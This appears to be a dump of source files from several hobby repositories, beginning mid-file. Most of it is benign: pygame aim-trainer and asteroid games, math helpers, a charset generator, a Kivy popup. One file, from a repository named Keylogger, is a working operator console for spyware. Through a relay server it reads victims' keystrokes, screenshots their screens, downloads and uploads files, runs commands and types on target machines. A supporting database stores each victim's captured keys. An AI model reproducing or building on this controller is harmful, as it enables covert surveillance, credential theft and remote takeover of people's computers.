if not key in default_config[mainKey].keys():
continue
if "color" in key.lower():
if "colors" in key.lower():
colors_list = []
                        # Replace color names with RGB tuples.
try:
for color in config[mainKey][key]:
if type(color) is str:
color = getrgb(color)
elif type(color) in [tuple,list]:
color = color
else: raise TypeError
colors_list.append(color)
file_config[mainKey][key] = colors_list.copy()
except: pass
continue
                    # Replace the color name with an RGB tuple.
try:
color = config[mainKey][key]
if type(color) is str:
color = getrgb(color)
elif type(color) in [tuple,list]:
color = color
else: raise TypeError
file_config[mainKey][key] = color
except:
continue
                # Put the setting from the file into the dictionary.
file_config[mainKey][key] = config[mainKey][key]
        # Pass the dictionary values to the program's main class as attributes.
for mainKey in file_config.keys():
for key in file_config[mainKey].keys():
setattr(App,key.upper(),file_config[mainKey][key])
except:
file = open(filename,"w")
file.write(json.dumps(default_config,indent=indent))
file.close()
if __name__ == "__main__":
setConfig()
App().run()
```
#### File: Aim-Coach/classes/App.py
```python
from classes.Display import Display
from classes.FinalScoreboard import FinalScoreboard
from classes.Sounds import Sounds
from classes.TargetArea import TargetArea
from classes.Target import Target
from classes.Text import Text
from classes.Timer import Timer
from time import time
import pygame
class App(object):
"""
Main Class
"""
BORDER = 10
DISPLAY_COLOR = (100,100,100)
DISPLAY_GEOMETRY = [700,500]
DISPLAY_TITLE = "Aim Trainer"
FRAMES_PER_SECOND = 60
LIVES = 5
MISSING_SHOTS_DECREASES_LIFE = False
SCOREBOARD_AREA = 50
SCOREBOARD_COLOR = (255,255,255)
SCOREBOARD_FONT = ('Comic Sans MS', 21)
SCOREBOARD_FORMAT = "Hits: %i Accuracy: %.1f%% FPS: %i Targets: %.2f/s Lives: %i"
SCOREBOARD_LOCATION = [BORDER+1,10]
SOUNDS_BUFFER = 64
TARGET_ADD_TIME = 0.2
TARGET_AREA_COLORS = [(128,128,128),(148,148,148)]
TARGET_BORDER = 0
TARGET_AREA_GEOMETRY = [0+BORDER,SCOREBOARD_AREA+BORDER,DISPLAY_GEOMETRY[0]-BORDER,DISPLAY_GEOMETRY[1]-BORDER]
TARGET_COLORS = [(255,0,0),(255,255,255)]
TARGET_LIMIT_PER_SECOND = None
TARGET_RADIUS = 40
TARGETS_PER_SECOND = 1.8
TARGET_SPEED = 0.4
FINAL_SCOREBOARD_BACKGROUND_COLOR = (255,255,255)
FINAL_SCOREBOARD_BORDER = 5
FINAL_SCOREBOARD_BORDER_COLOR = (139,69,19)
FINAL_SCOREBOARD_FONT = ("Arial",40)
FINAL_SCOREBOARD_GEOMETRY = [TARGET_AREA_GEOMETRY[0]+50,TARGET_AREA_GEOMETRY[1]+50,TARGET_AREA_GEOMETRY[2]-50,TARGET_AREA_GEOMETRY[3]-50]
FINAL_SCOREBOARD_TEXT_COLOR = (80,80,80)
def __init__(self):
self.sounds = Sounds(self.SOUNDS_BUFFER)
pygame.init()
self.display = Display(
*self.DISPLAY_GEOMETRY,
self.DISPLAY_TITLE,
self.DISPLAY_COLOR
)
self.__surface = self.display.getSurface()
self.finalScoreboard = FinalScoreboard(
self.__surface,
*self.FINAL_SCOREBOARD_GEOMETRY,
self.FINAL_SCOREBOARD_FONT,
self.FINAL_SCOREBOARD_BORDER,
self.FINAL_SCOREBOARD_BORDER_COLOR,
self.FINAL_SCOREBOARD_TEXT_COLOR,
self.FINAL_SCOREBOARD_BACKGROUND_COLOR,
self.TARGET_COLORS
)
self.scoreboardText = Text(
self.__surface,
*self.SCOREBOARD_LOCATION,
text_font=self.SCOREBOARD_FONT,
text_color=self.SCOREBOARD_COLOR
)
self.targetArea = TargetArea(
self.__surface,
*self.TARGET_AREA_GEOMETRY,
self.TARGET_AREA_COLORS
)
self.__timer = Timer()
self.__clock = pygame.time.Clock()
def captureEvents(self):
"""
Method for capturing events and taking action based on them.
"""
for event in pygame.event.get():
            # Check whether there was an event to close the program window.
if event.type == pygame.QUIT:
self.__stop = True
break
            # Check whether a key was pressed.
if event.type == pygame.KEYDOWN:
# Se a tecla pressionada foi "Esc", o programa será fechado.
if event.key == pygame.K_ESCAPE:
self.__stop = True
break
# Se a tecla pressionada foi "Enter" ou "Space", será criada uma nova
# sessão caso o usuário esteja na tela de fim de jogo.
elif event.key in [pygame.K_RETURN,pygame.K_SPACE]:
if not self.__start:
self.__start = True
# Se o botão "1" do mouse foi pressionado, será efetuado um disparo.
if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
                # If a session is running, a gunshot sound is played.
                # Otherwise, an out-of-ammunition sound is played instead.
if self.__start:
self.sounds.playSound(self.sounds.shooting_sound)
else:
self.sounds.playSound(self.sounds.without_ammunition_sound)
continue
                # Check whether the shot hit any target.
for target in self.__targets.copy():
                    # Get the (x,y) position of the shot relative to the target.
hit = target.checkHit()
                    # On a hit, increase the hit count and remove the target.
if hit:
self.sounds.playSound(self.sounds.metal_hit_sound)
self.__shots.append(hit)
self.__targets.remove(target)
self.__hits += 1
return
                # If no target was hit, the failure count increases and, if the
                # option to lose lives on missed shots is enabled, the user
                # loses one life in the session.
if self.MISSING_SHOTS_DECREASES_LIFE:
self.__lives -= 1
self.__failures += 1
def createTarget(self):
"""
Method to create a target within the screen.
"""
target = Target(
surface = self.__surface,
area_geometry = self.TARGET_AREA_GEOMETRY,
radius=self.TARGET_RADIUS,
target_colors=self.TARGET_COLORS
)
self.__targets.append(target)
def gameOver(self):
"""
Method for creating an endgame screen.
"""
self.__start = False
        # Get the last session's information to fill in the final scoreboard.
hits = self.__hits
accuracy = FinalScoreboard.getAccuracy(self.__hits+self.__failures,self.__hits)
targets_per_second = self.__target_per_second
time = self.__timer.getTime()
shots = self.__shots.copy()
        # While the user does not try to close the program or press a key to
        # start a new session, the game-over screen keeps being drawn.
while not self.__stop and not self.__start:
self.captureEvents()
self.display.drawDisplay()
self.targetArea.drawArea()
            # Put an instruction in the scoreboard area on how to continue with a new session.
self.scoreboardText.setText('GAME OVER: Click "Enter" or "Space" to continue.')
self.scoreboardText.drawText()
self.finalScoreboard.drawFinalScoreboard(hits,accuracy,targets_per_second,time,shots)
self.__clock.tick(self.FRAMES_PER_SECOND)
pygame.display.flip()
        # If the user pressed a button to quit, the program closes.
        # If the user pressed a key to continue, a new session is created.
if self.__stop:
pygame.quit()
else: self.run()
def run(self):
"""
Method to start a new session.
"""
self.__failures = 0
self.__hits = 0
self.__stop = False
self.__targets = []
self.__shots = []
self.__lives = self.LIVES
self.__target_per_second = self.TARGETS_PER_SECOND
self.__start = True
        # Set the scoreboard font.
self.scoreboardText.setFont(self.SCOREBOARD_FONT)
        # Start the stopwatch.
self.__timer.start()
last_time_to_create_target = time()
last_time_to_add_tps = time()
        # While the user does not try to close the program and still has lives,
        # the session keeps running.
while not self.__stop and self.__lives > 0:
self.captureEvents()
            # Create a new target based on the targets-per-second rate.
if time() - last_time_to_create_target >= 1/self.__target_per_second:
self.createTarget()
last_time_to_create_target = time()
            # Increase the number of targets per second.
if time() - last_time_to_add_tps >= self.TARGET_ADD_TIME:
if not self.TARGET_LIMIT_PER_SECOND or self.TARGET_LIMIT_PER_SECOND > self.__target_per_second:
self.__target_per_second += 1/self.__target_per_second/100
last_time_to_add_tps = time()
self.update()
        # If the loop ended because of an event to close the program,
        # the program is terminated. Otherwise, it means the current
        # session is over and the game goes straight to the
        # game-over screen.
if self.__stop:
pygame.quit()
else:
self.gameOver()
def setScore(self):
"""
Method for inserting updated information in the scoreboard.
"""
hits = self.__hits
accuracy = FinalScoreboard.getAccuracy(self.__hits+self.__failures,self.__hits)
fps = self.__clock.get_fps()
targets_per_second = self.__target_per_second
self.scoreboardText.setText(self.SCOREBOARD_FORMAT%(hits,accuracy,fps,targets_per_second,self.__lives))
def targetAnimation(self):
"""
Method for generating target animation.
"""
targets = self.__targets.copy()
targets.reverse()
for target in targets:
try:
                # If the target cannot grow any further,
                # it starts shrinking.
if target.increase(self.TARGET_SPEED) == -1:
target.decreases(self.TARGET_SPEED)
target.drawTarget(border=self.TARGET_BORDER)
            # If the target has shrunk down to the limit, it is removed
            # and a target-lost sound is played.
except ValueError:
self.sounds.playSound(self.sounds.target_loss_sound)
self.__targets.remove(target)
self.__lives -= 1
def update(self):
"""
Method for updating the graphics part of the program.
"""
self.setScore()
self.display.drawDisplay()
self.scoreboardText.drawText()
self.targetArea.drawArea()
self.targetAnimation()
self.__clock.tick(self.FRAMES_PER_SECOND)
pygame.display.flip()
```
#### File: Aim-Coach/classes/Sounds.py
```python
from pygame import mixer
from os.path import join
from os import getcwd
class Sounds(object):
"""
Class for playing program sounds.
"""
__cwd = getcwd()
metal_hit_sound = 0
shooting_sound = 1
target_loss_sound = 2
without_ammunition_sound = 3
metal_hit_sound_path = join(__cwd,"sounds","metal_hit.wav")
shooting_sound_path = join(__cwd,"sounds","shooting.wav")
target_loss_sound_path = join(__cwd,"sounds","target_loss.wav")
without_ammunition_sound_path = join(__cwd,"sounds","without_ammunition.wav")
def __init__(self,buffer=64):
# The "buffer" parameter must have a low value to decrease latency.
mixer.init(buffer=buffer)
self.__sounds = {}
self.__sounds[self.metal_hit_sound] = mixer.Sound(self.metal_hit_sound_path)
self.__sounds[self.shooting_sound] = mixer.Sound(self.shooting_sound_path)
self.__sounds[self.target_loss_sound] = mixer.Sound(self.target_loss_sound_path)
self.__sounds[self.without_ammunition_sound] = mixer.Sound(self.without_ammunition_sound_path)
def playSound(self,sound):
"""
Method for playing specific loaded sounds.
The "sound" parameter must be a Sounds attribute where the name ends with "sound".
"""
if sound in self.__sounds:
self.__sounds[sound].play()
@staticmethod
def playSoundFrom(filename):
"""
Method to play sound from a file.
"""
mixer.music.load(filename)
mixer.music.play()
```
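A minimal usage sketch for the class above (assumes the `sounds/*.wav` assets exist under the working directory):
```python
sounds = Sounds(buffer=64)
sounds.playSound(Sounds.shooting_sound)            # play a preloaded effect by its class-level id
Sounds.playSoundFrom(Sounds.shooting_sound_path)   # or stream a file through the music mixer
```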
|
{
"source": "JeanExtreme002/Angle-Gauge",
"score": 3
}
|
#### File: JeanExtreme002/Angle-Gauge/util.py
```python
import math
def getHypotenuse(b,c):
"""
Retorna a hipotenusa de um triângulo retângulo
utilizando os seus catetos.
Fórmula: a² = b² + c²
"""
return ((b**2) + (c**2)) ** 0.5
def cos2degrees(x):
"""
Retorna o cosseno em graus.
"""
return math.degrees(math.acos(x))
```
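Quick checks of the helpers above:
```python
from util import getHypotenuse, cos2degrees  # import path assumed from this file's location

assert getHypotenuse(3, 4) == 5.0           # classic 3-4-5 right triangle
assert round(cos2degrees(0.5), 6) == 60.0   # arccos(0.5) = 60 degrees
```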
|
{
"source": "JeanExtreme002/Asteroids-Escape",
"score": 3
}
|
#### File: classes/app/__init__.py
```python
from classes.app.mainMenu import MainMenu
from classes.app.system import System
from classes.entities.asteroids import Asteroids
from classes.entities.spaceship import Spaceship
from classes.util.background import Background
from classes.util.button import Button
from classes.util.text import Text
import pygame
class App(System):
FRAMES_PER_SECOND = 60
MARGIN = (50,100,50,50)
WINDOW_GEOMETRY = (900,600)
WINDOW_TITLE = "Asteroids Escape"
def __init__(self):
try:
super().__init__(self.WINDOW_GEOMETRY, self.WINDOW_TITLE)
except FileNotFoundError as error:
raise error
self.__window = pygame.display.get_surface()
self.__bigTitleText = Text(self.__window, ( self.FONTS["autumn"], 100 ))
self.__infoText = Text(self.__window, (self.FONTS["autumn"],35) )
self.__titleText = Text(self.__window, (self.FONTS["space_age"],50) )
self.__startButton = Button(self.__window, (self.IMAGES["start_button"], self.IMAGES["active_start_button"]))
self.asteroids = Asteroids(self.__window, self.IMAGES["asteroid"], self.MARGIN)
self.background = Background(self.__window, self.IMAGES["background"])
self.spaceship = Spaceship(self.__window, self.IMAGES["spaceship"], self.IMAGES["explosion"], self.MARGIN)
self.__reset()
def __captureEvents(self):
"""
        Method to take actions based on captured events.
"""
for event in pygame.event.get():
            if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:
if self.__startButton.pressed:
self.__playing = True
elif event.type == pygame.QUIT:
self.__stop = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.__stop = True
                # Pause or unpause the game.
elif event.key == pygame.K_p and self.__playing:
self.__pause = not self.__pause
if self.__pause:
self.sounds.pause()
else:
self.sounds.unpause()
                # Start the game.
elif event.key == pygame.K_RETURN:
self.__playing = True
def __collided(self):
"""
        Method to check whether the spaceship collided with the asteroids.
"""
for asteroid in self.asteroids:
if asteroid in self.spaceship:
return True
return False
def __reset(self):
"""
        Method to reset the game.
"""
self.__asteroids_limit = 2
self.__distance = 400
self.__fps = self.FRAMES_PER_SECOND
self.__game_over = False
self.__pause = False
self.__playing = False
self.__score = 0
self.__stop = False
self.__time = None
self.__velocity = 5
        # Delete all asteroids, center the spaceship on the screen and restart the stopwatch.
self.asteroids.clear()
self.spaceship.draw(self.WINDOW_GEOMETRY[0] // 2, self.WINDOW_GEOMETRY[1] // 2)
self.stopwatch.start()
def run(self):
"""
        Method to start the game.
"""
        # Create the main menu and wait for the user to press the "start" button or close the program.
mainMenu = MainMenu(self.__window, self.spaceship, self.__titleText, self.__startButton)
while not self.__playing and not self.__stop:
self.__captureEvents()
if self.__playing: break
self.__update()
mainMenu.draw()
self.updateWindow()
self.clock.tick(self.FRAMES_PER_SECOND)
        # Close the window if the user wants to quit.
if self.__stop:
pygame.quit()
return
        # Start the session.
self.__start()
pygame.quit()
@property
def score(self):
return self.__score
def __start(self):
"""
        Method to start a new game.
"""
        # Reset the previous game's data.
self.__reset()
self.__playing = True
        # Play background music.
self.sounds.play(self.SOUNDS["music"], loop = -1)
        # Hide the cursor during the game and set the mouse position to the center of the screen.
self.spaceship.cursor(False)
self.spaceship.centralize()
while not self.__stop:
self.__time = self.stopwatch.get()
            # Check whether the spaceship collided.
if self.__collided(): break
self.__captureEvents()
            # Update the game.
self.__update(updateEntities = True)
self.updateWindow()
            # While the game is paused, the mouse stays centered
            # on the spaceship and no object can move.
if self.__pause:
self.spaceship.centralize()
continue
            # Once the most recently created asteroid is at least X pixels away
            # from its spawn point, a new asteroid is created.
if self.asteroids.empty or self.WINDOW_GEOMETRY[0] - self.asteroids[-1].x > self.__distance:
self.asteroids.createNewAsteroid((1, self.__asteroids_limit))
if self.__distance > 200:
self.__distance -= 10
            # Move the asteroids and the spaceship.
self.asteroids.move(self.__velocity, self.__increaseScore)
self.spaceship.move()
if self.__stop: return
        # Play the explosion sound and run its animation.
self.sounds.play(self.SOUNDS["explosion"])
self.spaceship.explode(lambda: self.__update(updateEntities = True))
self.__captureEvents()
self.spaceship.cursor(True)
self.__playing = False
self.__game_over = True
        # Wait for the user to press the "start" button or close the program.
while not self.__stop and not self.__playing:
self.__captureEvents()
self.__update(updateEntities = True)
self.__startButton.draw(self.WINDOW_GEOMETRY[0] // 2, self.WINDOW_GEOMETRY[1] // 100 * 80)
self.updateWindow()
        # Start a new game.
if self.__playing:
self.__start()
def __increaseScore(self):
"""
Método para aumentar a pontuação do usuário.
"""
self.__score += 1
if self.__score % 10 == 0:
self.__increaseDifficulty()
def __increaseDifficulty(self):
"""
Método para aumentar o nível de dificuldade do jogo.
"""
        # Increase the FPS by 10 for every 10 points, up to a maximum of 200.
if self.__score % 10 == 0 and self.__fps < 200:
self.__fps += 10
        # Increase the speed when the player reaches 10 points.
if self.__score == 10:
self.__velocity += 1
        # Every 20 points, the speed increases by 1 pixel, up to a maximum of 15.
if self.__score % 20 == 0 and self.__velocity < 15:
self.__velocity += 1
def __update(self, updateEntities = False):
"""
Método para atualizar a tela do jogo.
"""
        # Clear the screen and draw a background.
        # If the user is not currently playing, the background is static.
self.__window.fill([0,0,0])
self.background.draw( 2 if self.__playing and not self.__pause else 0 )
        # Update the entities.
if updateEntities:
self.spaceship.draw(self.spaceship.x, self.spaceship.y)
self.asteroids.draw()
if self.__pause:
self.__bigTitleText.draw("PAUSED", self.WINDOW_GEOMETRY[0] // 2, 100, color = [255,0,0], outline = [0,0,0])
elif self.__game_over:
self.__bigTitleText.draw("GAME OVER", self.WINDOW_GEOMETRY[0] // 2, 100, color = [255,0,0], outline = [0,0,0])
        # Show the score and the elapsed game time.
if self.__playing or self.__game_over:
self.__infoText.draw("Score: %i" % self.__score, 30, 10, place = "left")
self.__infoText.draw("Time: %s" % self.__time, self.WINDOW_GEOMETRY[0] - 30, 10, place = "right")
        self.clock.tick(self.__fps)  # Use the current FPS so the difficulty increase takes effect.
@property
def window(self):
        return self.__window
```
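A minimal sketch of how `App` is presumably launched; the actual entry script is not part of this file, and the asset files loaded by `System` are assumed to exist.

```python
# Hypothetical entry point -- the real launcher is not shown here.
from classes.app import App

if __name__ == "__main__":
    app = App()  # may raise FileNotFoundError if game assets are missing
    app.run()    # blocks until the player closes the window
```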
#### File: classes/entities/asteroids.py
```python
from pygame import image
import random
class Asteroids(object):
__asteroids = []
__index = 0
def __getitem__(self,index):
return self.__asteroids[index]
def __init__(self, window, image_fn, margin = (0,0)):
self.__window = window
self.__window_width, self.__window_height = self.__window.get_size()
self.__image = image.load(image_fn)
self.__WIDTH, self.__HEIGHT = self.__image.get_size()
self.__margin = margin
def __iter__(self):
return self
def __next__(self):
if self.__index >= len(self.__asteroids):
self.__index = 0
raise StopIteration
else:
try:
return self.__asteroids[self.__index]
finally:
self.__index += 1
def clear(self):
self.__asteroids.clear()
def createNewAsteroid(self, amount = (1,1)):
        # Build a list of all positions available for creating asteroids.
start = self.__margin[0]
stop = self.__window_height - self.__margin[1] - self.height
pos_list = [ num for num in range(start, stop) ]
for i in range(random.randint(*amount)):
if not pos_list: break
            # Pick random X and Y positions.
pos_y = random.choice(pos_list)
pos_x = random.randint(self.__window_width + 50, self.__window_width + 50 + self.width)
            # Remove the positions now occupied by the asteroid.
index = pos_list.index(pos_y)
part1 = 0 if index - self.height < 0 else index - self.height + 1
part2 = index + 1 if index + self.height >= len(pos_list) else index + self.height + 1
pos_list = pos_list[:part1] + pos_list[part2:]
self.__asteroids.append(self.__window.blit(self.__image,[pos_x, pos_y]))
def draw(self):
index = 0
for asteroid in self.__asteroids:
x = asteroid.x
y = asteroid.y
            # After drawing, the rect.Rect object stored in the asteroid list is replaced
            # by a new one, to avoid future conflicts.
self.__asteroids[index] = self.__window.blit(self.__image, [x, y] )
self.__asteroids[index].x = x
index += 1
@property
def empty(self):
        return not self.__asteroids
@property
def height(self):
return self.__HEIGHT
def move(self, px, scoreFunction = None):
for asteroid in self.__asteroids:
asteroid.x -= px
        # Iterate over a copy of the list, checking whether any asteroid has left the game screen.
        for asteroid in list(self.__asteroids):
if asteroid.x < -self.width:
self.__asteroids.remove(asteroid)
if scoreFunction: scoreFunction()
@property
def width(self):
return self.__WIDTH
```
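A small usage sketch for `Asteroids`, assuming a pygame display already exists; the image path and window size below are placeholders.

```python
# Hypothetical usage; "asteroid.png" is a placeholder image path.
import pygame
from classes.entities.asteroids import Asteroids

pygame.init()
window = pygame.display.set_mode((900, 600))
asteroids = Asteroids(window, "asteroid.png", margin=(50, 100))
asteroids.createNewAsteroid((1, 3))  # spawn 1 to 3 asteroids off the right edge
asteroids.move(5)                    # shift every asteroid 5 px to the left
print(asteroids.empty)               # False while asteroids remain
```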
#### File: classes/util/sounds.py
```python
from pygame import mixer
mixer.init(buffer=1024)
class Sounds(object):
def play(self, filename, loop = 1):
mixer.music.load(filename)
mixer.music.play(loop)
def pause(self):
mixer.music.pause()
def unpause(self):
mixer.music.unpause()
```
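The class is a thin wrapper around `pygame.mixer.music`, so usage is direct; the filename below is a placeholder.

```python
from classes.util.sounds import Sounds

sounds = Sounds()
sounds.play("music.ogg", loop=-1)  # loop = -1 repeats the track indefinitely
sounds.pause()
sounds.unpause()
```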
|
{
"source": "JeanExtreme002/Brute-Force",
"score": 4
}
|
#### File: src/brute/charset.py
```python
import re
class Range(object):
def __init__(self, string = "a-zA-Z0-9"):
self.__range = re.findall("(.-.)", string)
def __iter__(self):
self.__index = -1
return self
def __next__(self):
self.__index += 1
if self.__index < len(self.__range):
return self.__range[self.__index].split("-")
raise StopIteration
def get_charset_from_file(filename, excludes = ["\n", " "]):
"""
Retorna uma lista com todos os caracteres de um arquivo
"""
charset = []
with open(filename) as file:
for char in file.read():
            if char not in charset and char not in excludes:
charset.append(char)
return charset
def get_charset_from_range(range_obj):
"""
Recebe um objeto de Range e retorna uma lista de caracteres.
"""
if not isinstance(range_obj, Range):
raise TypeError('The "range_obj" parameter must be an instance of Range.')
charset = []
for range_ in range_obj:
start = ord(range_[0])
stop = ord(range_[1])
charset.extend([chr(char_id) for char_id in range(start, stop + 1)])
return charset
def get_default_charset():
"""
Retorna uma lista com os caracteres [A-Z a-z 0-9]
"""
range_ = Range("A-Za-z0-9")
return get_charset_from_range(range_)
```
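A quick example of how `Range` and `get_charset_from_range` combine: the regex extracts every `x-y` pair, and each pair is expanded through `ord`/`chr`. The import path assumes the package is importable as `brute.charset` (the dump places it under `src/brute/`).

```python
from brute.charset import Range, get_charset_from_range, get_default_charset

print(get_charset_from_range(Range("a-c0-2")))  # ['a', 'b', 'c', '0', '1', '2']
print(get_default_charset()[:5])                # ['A', 'B', 'C', 'D', 'E']
```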
|
{
"source": "JeanExtreme002/Chat",
"score": 3
}
|
#### File: app/popup/list.py
```python
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
import os
class List(Popup):
def __init__(self, title: str, size = ["400dp", "500dp"]):
path = os.path.split(__file__)[0]
self.content = Builder.load_file(os.path.join(path, "list.kv"))
super().__init__(title = title, content = self.content, size_hint = (None, None), size = size)
def insertItem(self, items, font_size = "15dp", height = "30dp", **kwargs):
"""
Insere itens na lista.
Param item: Deve ser uma lista contendo um ou dois valores somente, exemplo: ["carro", "moto"].
"""
align = ["left", "right"]
box = BoxLayout(size_hint_y = None, height = height)
for item in items[:2]:
label = Label(
text = item,
font_size = font_size,
size_hint_y = None,
height = height,
halign = align[items.index(item)],
**kwargs
)
label.bind(size = label.setter('text_size'))
box.add_widget(label)
self.content.ids.box.add_widget(box)
```
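A sketch of how this popup is presumably used from inside a running Kivy app; the item values are placeholders, and `list.kv` must sit next to the module. Note that `insertItem` aligns labels with `items.index(item)`, so two identical values both resolve to the left alignment.

```python
# Hypothetical usage; requires a running Kivy application.
from app.popup.list import List

popup = List(title="Users online")
popup.insertItem(["alice", "online"])
popup.insertItem(["bob", "away"])
popup.open()  # standard kivy Popup method
```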
|
{
"source": "JeanExtreme002/Keylogger",
"score": 3
}
|
#### File: app/terminal/__init__.py
```python
from PIL import Image
from pyperclip import copy
from terminal.conn import *
from terminal.help import info
import base64
import io
import keyboard
import os
import random
import subprocess
import sys
import time
class Terminal(object):
__code = 0
__stop = True
__username = None
info = ""
output = ""
destroy_url = ""
input_url = ""
output_url = ""
keylogger_url = ""
def __init__(self, host = "localhost"):
self.__server = host
self.destroy_url = format_url(destroy_url = self.__server)
self.menu_url = format_url(menu_url = self.__server)
self.__commands = {
"activate": lambda args: self.change_status(True),
"copy": lambda args: copy(self.output),
"clear": lambda args: self.clear_screen(),
"destroy": lambda args: self.destroy(),
"download": lambda filename: self.download(filename),
"help": lambda args: self.help(),
"keylogger": lambda args: self.show_keys(),
"print": lambda args: self.print_screen(),
"save": lambda args: self.save_keys(),
"select": lambda user: self.change_user(user),
"send": lambda filename: self.send_file(filename),
"stop": lambda args: self.change_status(False),
"user": lambda args: print(" " + self.__username),
"users": lambda args: self.show_users(),
"write": lambda text: self.write(text)
}
keyboard.on_press_key("q", self.stop)
def change_status(self, status):
"""
Ativa ou desativa o envio de teclas.
"""
if not self.hasUser(): return
self.output = self.send("#self.activate();") if status else self.send("#self.stop();")
print(" " + self.output)
def change_user(self, user):
"""
Seleciona um usuário.
"""
# Verifica se o nome é válido.
if not user in get_users(self.menu_url):
return print(" " + user, "does not exists.")
        # Set the selected user and the URLs.
self.input_url = format_url(input_url = self.__server + "/" + user)
self.keylogger_url = format_url(keylogger_url = self.__server + "/" + user)
self.output_url = format_url(output_url = self.__server + "/" + user)
self.__username = user
def clear_screen(self):
"""
Limpa o terminal.
"""
if "win" in sys.platform: os.system("cls")
else: os.system("clear")
def destroy(self):
"""
Apaga todos os dados do servidor.
"""
send(url = self.destroy_url, text = "True")
def download(self, filename):
"""
Baixa um arquivo do computador alvo.
"""
if not self.hasUser(): return
output = self.send('#self.download(r"{}");'.format(filename))
data = base64.b64decode(output)
with open(os.path.split(filename)[-1], "wb") as file:
file.write(data)
def get_code(self):
"""
Retorna um código.
"""
self.__code += random.randint(1, 9)
return self.__code
def hasUser(self):
"""
Verifica se um usuário foi selecionado.
"""
if self.__username: return True
print(" No users were selected.")
def help(self):
"""
Imprime texto de ajuda.
"""
print(self.info)
def print_screen(self):
"""
Obtém imagem da tela do computador alvo.
"""
if not self.hasUser(): return
        # Get the image bytes.
output = self.send("#self.print_screen();")
image_data = base64.b64decode(output)
        # Show the image.
image = Image.open(io.BytesIO(image_data))
image.show()
def run(self):
"""
Inicializa o terminal.
"""
while True:
            # Get the user's command.
command = input("\n In: ")
print("")
if not command: continue
            # Check whether the input is a predefined command.
if command.split(" ", maxsplit = 1)[0].lower() in self.__commands:
command = command.split(" ", maxsplit = 1)
self.__commands[command[0].lower()](command[-1])
continue
            # Check whether it is a shell command to run on the local machine.
            elif command[0] not in "$#&":
self.output = str(subprocess.getoutput(command))
print(self.output)
continue
            # Check whether a user has been selected.
elif not self.__username:
print(" No users were selected.")
continue
            # Check whether the command ends with a semicolon.
elif not command.endswith(";"):
print(' Use ";" at the end of each command.')
continue
            # Send a command to the target computer.
self.output = self.send(command)
print(" " + self.output)
def save_keys(self):
"""
Salva as teclas pressionadas em um arquivo de texto.
"""
if not self.hasUser(): return
chars = 0
with open("keys_%s.txt" % self.__username, "w") as file:
            # Iterate over all keys and write them into the file.
for key in get_keys(self.keylogger_url):
file.write(key + " ")
chars += len(key)
                # Limit each line to only 60 characters.
if chars >= 60:
file.write("\n")
chars = 0
def send(self, command):
"""
Envia comando para ser executado no computador alvo.
"""
# Obtém um novo código para o envio.
code = self.get_code()
        # Send the command.
send(url = self.input_url, text = str(code) + ":" + command)
r_code = -1
        # Wait for the response carrying the same code as the request.
while int(r_code) != code:
output = get_content(self.output_url)
if ":" in output:
r_code, output = output.split(":", maxsplit = 1)
        # Return the obtained response.
return output
def send_file(self, filename):
"""
Envia um arquivo.
"""
if not self.hasUser(): return
        # Check whether the file exists.
if not os.path.exists(filename):
print(" This file does not exist")
return
with open(filename, "rb") as file:
data = file.read()
data = base64.b64encode(data).decode()
filename = os.path.split(filename)[-1]
        # Send the data.
output = self.send('#self.create_file(r"{}","{}");'.format(filename, data))
print(" " + output)
def show_keys(self):
"""
Mostra as teclas pressionadas pelo usuário.
"""
if not self.hasUser(): return
self.__stop = False
while not self.__stop:
            # Get all pressed keys.
keys = get_keys(self.keylogger_url, wait = False)
self.clear_screen()
            # Iterate over all keys and print them.
for key in keys:
print(" "+ key, end = "")
if key.lower() == "enter": print("")
print("")
time.sleep(0.1)
def show_users(self):
"""
Mostra todos os usuários do servidor.
"""
users = get_users(self.menu_url)
for user in users: print(" " + user)
def stop(self, key = None):
"""
Interrompe um evento.
"""
self.__stop = True
def write(self, text):
"""
Escreve um texto no computador alvo.
O caractere especial <enter> serve para a tecla ENTER
ser apertada no computador alvo.
"""
if not self.hasUser(): return
keys = []
        # Iterate over every character of the text.
for char in text.replace("<enter>", "\n"):
if char == "\n": char = "enter"
keys.append(char)
        # Send the command.
self.output = self.send("#pyautogui.press({});".format(keys))
print(" " + self.output)
Terminal.info = info
```
#### File: app/model/database.py
```python
class Database():
__users = {}
def __contains__(self, user):
return user in self.__users
def addKey(self, user, value):
self.__users[user]["keys"].append(value)
def createUser(self, user):
self.__users[user] = {"keys": [], "output": "", "input": ""}
def destroy(self):
self.__users.clear()
def getInput(self, user):
input = self.__users[user]["input"]
self.__users[user]["input"] = ""
return input
def getKeys(self, user):
return self.__users[user]["keys"]
def getOutput(self, user):
output = self.__users[user]["output"]
self.__users[user]["output"] = ""
return output
def setInput(self, user, value):
self.__users[user]["input"] = value
def setOutput(self, user, value):
self.__users[user]["output"] = value
@property
def users(self):
return list(self.__users.keys())
```
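A short usage example. Note that `__users` is a class attribute, so every `Database` instance shares the same underlying store.

```python
from app.model.database import Database  # import path assumed from this dump

db = Database()
db.createUser("alice")
db.addKey("alice", "h")
db.setInput("alice", "dir")
print(db.getInput("alice"))  # 'dir' -- the input buffer is cleared on read
print("alice" in db)         # True, via __contains__
print(db.users)              # ['alice']
```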
|
{
"source": "JeanExtreme002/Locker",
"score": 3
}
|
#### File: src/client/display.py
```python
from colorama import Fore, Style
def show_message(message, end = "\n"):
print(Style.RESET_ALL + str(message), end = end)
def show_warning(message, end = "\n"):
print(Fore.YELLOW + str(message), end = end)
def show_error(message, end = "\n"):
print(Fore.RED + str(message), end = end)
```
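Minimal usage; note the module never calls `colorama.init()`, which older Windows terminals need for ANSI colors to render correctly.

```python
from src.client.display import show_message, show_warning, show_error

show_message("Vault opened.")
show_warning("Weak password detected.")
show_error("Wrong password.", end="\n\n")
```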
#### File: src/manager/database.py
```python
from ..util import crypt
from ..util import system
import json
import os
class Database(object):
def __init__(self, filename):
self.__filename = filename
self.__data = dict()
# Get the data from the database.
self.__create() if not os.path.exists(filename) else self.__load_data()
def __create(self):
# Generate a key and create the database.
self.__key = crypt.generate_keyV2()
self.__update_database()
def __decrypt(self, key, data):
# Return the decrypted data.
return json.loads(crypt.decryptV2(key, data).decode())
def __encrypt(self, key, data):
# Return the encrypted data.
return crypt.encryptV2(key, json.dumps(data).encode())
def __load_data(self):
# Open the file and get its data.
with open(self.__filename, "rb") as file:
key, data = file.read().split("=".encode(), maxsplit = 1)
# Get the key and decrypt the data.
self.__key = key + "=".encode()
